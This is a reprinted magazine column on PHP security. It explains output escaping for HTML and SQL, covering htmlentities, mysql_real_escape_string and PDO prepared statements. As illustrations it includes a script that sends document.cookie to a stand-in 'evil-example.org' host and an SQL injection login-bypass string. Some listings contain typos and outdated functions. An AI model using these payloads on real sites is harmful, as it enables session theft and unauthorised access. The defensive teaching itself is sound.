Escape Output

This article was first published in the “Tips & Tricks” column in php|architect magazine.

Filter Input. Escape Output. You’re hearing an awful lot of this from me lately, and as one person noted, “It’s great that they’re rubbing this topic in.” Indeed. This month’s Tips & Tricks wraps up the recent focus on security with a discussion on escaping output, why it’s important, and how to do it.

In the previous three Tips & Tricks columns, I’ve taken time to fully explain why all input should be filtered, and I’ve offered tips on how to filter your data so that the data you work with and save isn’t considered tainted. However, security-conscious programming doesn’t end with filtering data. Sure, now the data conforms to expectations, but it may still contain characters that have special meaning depending on the medium in which your application chooses to display it. That medium may be HTML, SQL, XML, WML, etc.

Thus, we must escape output.

What is output? Output is any data that leaves your application bound for another client or application. The receiving client or application expects the data to be of a specific format (HTML, SQL, etc.), and that format may include characters or other information with special meaning to the receiving client/application. The data being sent, however, might—and probably does— contain special characters that should not be interpreted with any special meaning by the receiving client.

Data may leave your application in the form of HTML sent to a Web browser, SQL sent to a database, XML sent to an RSS reader, WML sent to a wireless device, etc. The possibilities are limitless. Each of these has its own set of special characters that are interpreted differently than the rest of the plain text received. Sometimes we want to send these special characters so that they are interpreted (HTML tags sent to a Web browser, for example), while other times (in the case of input from users or some other source), we don’t want the characters to be interpreted, so we need to escape them.

Escaping is also sometimes referred to as encoding. In short, it is the process of representing data in a way that it will not be executed or interpreted. For example, HTML will render the following text in a Web browser as bold-faced text because the <strong> tags have special meaning:

<strong>This is bold text.</strong>

But, suppose I want to render the tags in the browser and avoid their interpretation. Then, I need to escape the angle brackets, which have special meaning in HTML. The following illustrates the escaped HTML:

&lt;strong&gt;This is bold text.&lt;/strong&gt;

Why Escape?

So, you run a Web-based forum, and you don’t have a problem with users entering the occasional HTML tag. Why should you escape your output?

Here’s why: Suppose this forum allows users to enter HTML tags. That’s fair enough—you may want to allow them to enter bold-faced or italicized text—but then it outputs everything in its raw form—everything. So, all HTML tags get interpreted by the web browser.

What if a user enters the following?

<script>
location.href='http://evil-example.org/steal-cookies.php?cookies=' + document.cookie;
</script>

Any subsequent user who is logged into the forum and visits this page will now be redirected to http://evil-example.org/steal-cookies.php and any cookies set by the forum can be stolen.

Let’s look at another example. Many sites contain login forms, which usually consist of two fields—a username and a password. When a user enters a username and password, the application may enter the values into an SQL statement, as in the following:

$sql = "SELECT * FROM users
        WHERE username = '{$_POST[‘username’]}'
        AND password = '{$_POST['password']}'";

This statement will work just fine as long as a user enters a proper username and password, but suppose a user enters something like example' OR 1 = 1; -- as the username? The value of 1 will always equal 1, and since the user properly closed the single quote in the statement, the OR clause will be treated as part of the SQL, and everything after the -- will be ignored (at least in most database engines) as a comment. Thus, the user is able to log in without an account.

The first step to ensure situations such as these do not occur is to filter all input to ensure that no unexpected characters appear in the data. See the July 2005 through September 2005 issues of php|architect for my full discussion on input filtering.

After filtering, be sure to save the raw data. Do not escape it before storing. If escaped before storing, then it might be necessary to unescape it at some point in the future. For example, what if the data is escaped for HTML output and stored to a database table only to be retrieved later to output in XML or to PDF, etc.? Then, it must be unescaped to transport to those formats—and possibly escaped again to accommodate the new output medium. This process is bound to introduce more bugs to your code and could likely reduce the quality of the data. Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when outputting.

Escaping output is not a terribly difficult process. At the least, it may require the addition of a few extra lines of code, or it may require a little more attention to detail. The important thing to keep in mind is the format outputted and the special characters that need to be escaped for that format. For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output to these formats.

Escaping HTML

There are three main functions in PHP for escaping HTML: htmlentities(), htmlspecialchars(), and strip_tags().

In the case of strip_tags(), no special characters are actually escaped, but, instead, all HTML tags are removed. Using this function with no extra parameters is probably one of the safest ways to completely remove all HTML tags from output. I have seen other user-defined functions that attempt to do something similar by removing all but a set of allowed tags, but these are not without their flaws and can potentially introduce some nasty bugs that are too lenient when outputting data. Likewise, strip_tags() offers the option to allow certain tags with the format strip_tags($str, '<p> <a> <b>');, but this is also too lenient: attributes are not stripped from allowed tags, allowing onclick events, etc. to persist in output. Take the following code snippet, for example:

$str = '<p><b>Bold text</b><a href="#" onclick="alert(\'XSS\');">Link</a><img src="example.png"/></p>';
echo strip_tags($str, '<p> <a> <b>');

This code will output the following, complete with the cross-site scripting (XSS) in the onclick attribute:

<p><b>Bold text</b><a href="#" onclick="alert('XSS');">Link</a></p>

Rather than completely stripping the tags from output, a better alternative may be to escape all the tags, allowing them to render in the output. This is an easy task with htmlspecialchars() and htmlentities().

Both of these functions serve the same purpose: to convert special characters into their equivalent HTML entities. The main difference is that htmlentities() is more exhaustive, choosing to convert all characters with HTML character entity equivalents to their respective HTML entities. Thus, for its exhaustive nature, I will recommend htmlentites() as the better function to use to escape HTML output. For the above $str example, htmlentities() returns the following:

&lt;p&gt;&lt;b&gt;Bold text&lt;/b&gt;
&lt;a href=&quot;#&quot; onclick=&quot;alert('XSS');&quot;&gt;Link&lt;/a&gt;
&lt;img src=&quot;example.png&quot;/&gt;&lt;/p&gt;

In this case, however, allowing the <b> tags may be preferable, and so we can allow them by first escaping the output and then converting the selected HTML entities back to HTML with str_replace():

$str = htmlentities($str);
$str = str_replace('&lt;b&gt;', '<b>', $str);
$str = str_replace('&lt;/b&gt;', '</b>', $str);

This will ensure that we send only those special characters that we desire to have interpreted to the client. While this is a form of unescaping, which I mentioned earlier is not a desirable process, it is nevertheless a good alternative to using strip_tags() to allow certain tags, as it will ensure that any tags that contain undesirable attributes are not interpreted by the client. In addition, there is no guesswork involved here; I am not using a regular expression that I could potentially get wrong and, thus, introduce a hole in my application. I will always know what a <b> tag looks like after the angle brackets have been converted to their HTML entity equivalents, so it is easy for me to find and convert the tags back to HTML.

Escaping SQL

Similarly, PHP offers excellent built-in functions for escaping SQL statements according to the database engine used. For PostgreSQL, there is pg_escape_string() for MySQL, mysql_real_escape_string() and for SQLite, sqlite_escape_string(). If the other native database functions provided in PHP do not offer a similar function, then PHP offers addslashes(), though I would advise that the database’s native escape string function is always a better alternative than addslashes().

Listing 1.
<?php
$clean = filter($_POST, $post_whitelist);
$username = mysql_real_escape_string($clean['username']);
$password = mysql_real_escape_string($clean['password']);
$sql = "SELECT * FROM users
WHERE username = '{$username}'
AND password = '{$password'}";
?>

Using the SQL example from earlier, we can escape it using mysql_real_escape_string(), as shown in Listing 1, where we first filter it using the filter() function I gave in the August 2005 issue. Thus, if a user enters the value example' OR 1 = 1; -- as a username, the SQL that is executed will be:

SELECT * FROM users
WHERE username = 'example\' OR 1 = 1; --'
AND password = 'password'

The single quotation mark is escaped and no results are returned because this user doesn’t exist—the user can’t gain access to the application.

Some database functions, such as the unified ODBC functions, mysqli, and PDO (in PHP 5.1), use the concept of prepared statements to prepare and properly escape an SQL statement. Listing 2 illustrates a prepared statements example using PDO. The SQL statement that is created will appear much like the one listed above, but PDO offers added functionality through the optional bindParam() parameters to define the type and length of data.

Prepared statements also exist in PEAR::DB and other database abstraction classes, but PDO offers much promise since it is built into the language and, thus, much faster with less overhead.

So, if possible, use prepared statements (with PDO, if possible). If they aren’t available, use the database’s built-in escaping function. If that isn’t available, then fall back on addslashes() as a last resort.

Listing 2.
<?php
$clean = filter($_POST, $post_whitelist);
$db = new PDO('mysql:host=localhost;dbname=example', 'dbuser', 'dbpass');
$sql = 'SELECT * FROM users
WHERE username = :username
AND password = :password';
$stmt = $db->prepare($sql);
$stmt->bindParam(':username', $clean['username'], PDO_PARAM_STR, 25);
$stmt->bindParam(':password', $clean['password'], PDO_PARAM_STR, 16);
$stmt->execute();
?>

A Security-Conscious Mindset

The key to secure programming is having a security-conscious mindset. Filtering input and escaping output is just part of that mindset, but it takes more thought than simply copying code from elsewhere to introduce security to an application. It takes careful planning and diligent testing.

By now, I hope that you are well on your way to being a security-conscious programmer. I have introduced some tools and concepts to help you get started, and it is likely that you have thought of code you’ve already written and how to improve it using these principles.

So, have fun, good luck, and be sure to keep security at the forefront of a project. Security is not a design feature—it is an essential tool.